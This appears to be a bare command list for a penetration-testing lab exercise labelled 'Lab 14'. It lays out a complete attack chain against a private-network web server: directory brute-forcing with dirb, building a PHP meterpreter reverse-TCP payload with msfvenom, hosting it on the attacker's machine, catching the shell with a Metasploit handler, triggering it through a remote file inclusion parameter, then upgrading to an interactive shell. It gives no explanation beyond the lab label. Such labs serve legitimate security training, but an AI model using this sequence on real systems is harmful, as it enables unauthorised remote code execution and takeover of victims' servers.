Lab 14 Commands: dirb http://192.168.112.5/ -f msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.112.4 LPORT=4446 -f raw -o /var/www/html/evil.txt msfconsole use exploit/multi/handler set LPORT 4446 set LHOST 192.168.112.4 set PAYLOAD php/meterpreter_reverse_tcp run ?language=http://192.168.112.4/evil.txt python -c 'import pty; pty.spawn("/bin/sh")' id whoami